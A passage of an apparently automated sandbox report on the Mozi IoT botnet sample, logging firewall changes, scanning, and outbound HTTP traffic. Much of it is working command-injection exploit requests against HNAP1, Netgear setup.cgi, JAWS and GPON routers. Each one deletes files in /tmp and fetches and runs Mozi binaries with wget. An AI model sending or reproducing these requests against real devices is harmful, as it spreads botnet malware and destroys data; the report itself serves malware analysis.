              Source: /bin/sh (PID: 5118)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 144.76.43.37:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.254.64.88:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 113.161.185.44:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 34.66.226.190:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: /tmp/mozi.a.zip (PID: 4621)Socket: 0.0.0.0::60120
              Source: unknownTCP traffic detected without corresponding DNS query: 45.109.162.162
              Source: unknownTCP traffic detected without corresponding DNS query: 69.11.36.124
              Source: unknownTCP traffic detected without corresponding DNS query: 75.91.130.63
              Source: unknownTCP traffic detected without corresponding DNS query: 95.20.167.162
              Source: unknownTCP traffic detected without corresponding DNS query: 195.153.28.200
              Source: unknownTCP traffic detected without corresponding DNS query: 23.5.140.124
              Source: unknownTCP traffic detected without corresponding DNS query: 156.72.38.195
              Source: unknownTCP traffic detected without corresponding DNS query: 195.115.84.245
              Source: unknownTCP traffic detected without corresponding DNS query: 144.165.39.167
              Source: unknownTCP traffic detected without corresponding DNS query: 209.72.224.1
              Source: unknownTCP traffic detected without corresponding DNS query: 215.164.157.85
              Source: unknownTCP traffic detected without corresponding DNS query: 148.150.251.31
              Source: unknownTCP traffic detected without corresponding DNS query: 153.78.52.143
              Source: unknownTCP traffic detected without corresponding DNS query: 201.146.224.72
              Source: unknownTCP traffic detected without corresponding DNS query: 84.116.205.234
              Source: unknownTCP traffic detected without corresponding DNS query: 47.62.131.40
              Source: unknownTCP traffic detected without corresponding DNS query: 35.9.95.44
              Source: unknownTCP traffic detected without corresponding DNS query: 65.17.184.203
              Source: unknownTCP traffic detected without corresponding DNS query: 174.66.221.232
              Source: unknownTCP traffic detected without corresponding DNS query: 26.215.139.222
              Source: unknownTCP traffic detected without corresponding DNS query: 78.138.19.157
              Source: unknownTCP traffic detected without corresponding DNS query: 211.98.218.197
              Source: unknownTCP traffic detected without corresponding DNS query: 126.165.20.233
              Source: unknownTCP traffic detected without corresponding DNS query: 4.121.119.146
              Source: unknownTCP traffic detected without corresponding DNS query: 7.242.90.54
              Source: unknownTCP traffic detected without corresponding DNS query: 203.113.226.208
              Source: unknownTCP traffic detected without corresponding DNS query: 156.188.202.182
              Source: unknownTCP traffic detected without corresponding DNS query: 69.219.15.151
              Source: unknownTCP traffic detected without corresponding DNS query: 84.49.106.247
              Source: unknownTCP traffic detected without corresponding DNS query: 126.111.174.160
              Source: unknownTCP traffic detected without corresponding DNS query: 88.107.197.218
              Source: unknownTCP traffic detected without corresponding DNS query: 137.96.65.50
              Source: unknownTCP traffic detected without corresponding DNS query: 57.57.176.173
              Source: unknownTCP traffic detected without corresponding DNS query: 11.51.35.100
              Source: unknownTCP traffic detected without corresponding DNS query: 94.151.112.236
              Source: unknownTCP traffic detected without corresponding DNS query: 120.12.34.156
              Source: unknownTCP traffic detected without corresponding DNS query: 99.64.63.156
              Source: unknownTCP traffic detected without corresponding DNS query: 162.238.7.116
              Source: unknownTCP traffic detected without corresponding DNS query: 92.54.230.127
              Source: unknownTCP traffic detected without corresponding DNS query: 84.40.114.1
              Source: unknownTCP traffic detected without corresponding DNS query: 82.129.200.140
              Source: unknownTCP traffic detected without corresponding DNS query: 125.111.112.230
              Source: unknownTCP traffic detected without corresponding DNS query: 70.220.45.231
              Source: unknownTCP traffic detected without corresponding DNS query: 198.118.3.130
              Source: unknownTCP traffic detected without corresponding DNS query: 200.237.209.54
              Source: unknownTCP traffic detected without corresponding DNS query: 108.89.104.186
              Source: unknownTCP traffic detected without corresponding DNS query: 81.197.119.173
              Source: unknownTCP traffic detected without corresponding DNS query: 133.239.82.116
              Source: unknownTCP traffic detected without corresponding DNS query: 218.241.194.24
              Source: unknownTCP traffic detected without corresponding DNS query: 98.157.141.146
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/htmlContent-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sat, 06 Feb 2021 10:39:02 GMTContent-Length: 205Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e 4f ea f4 ee 51 f2 78 72 f4 2c 6b b3 32 cd eb ba aa 1f df 9d 1c 3d 4a d3 37 f3 a2 49 cf 8b 32 4f e7 59 93 e6 ef 56 45 9d cf c6 69 b1 4c a9 f9 d3 47 bf ef ec fe c1 55 3e f9 7d b3 d5 ea f7 2d 96 d3 06 ff 8c 57 f3 15 de 4e ab 65 5a 16 cb 1c 2d 77 f0 81 f6 f3 ff 00 a6 dc 9b 26 6f 00 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"OQxr,k2=J7I2OYVEiLGU>}-WNeZ-w&o
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 175.203.81.2:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.217.12.208:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 47.246.22.230:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 159.140.205.214:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 24.239.192.38:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.89.231.175:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 193.248.153.76:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 74.79.213.38:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.236.242.26:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.12.191.118:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 180.254.107.55:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
              Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 06 Feb 2021 10:36:20 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data 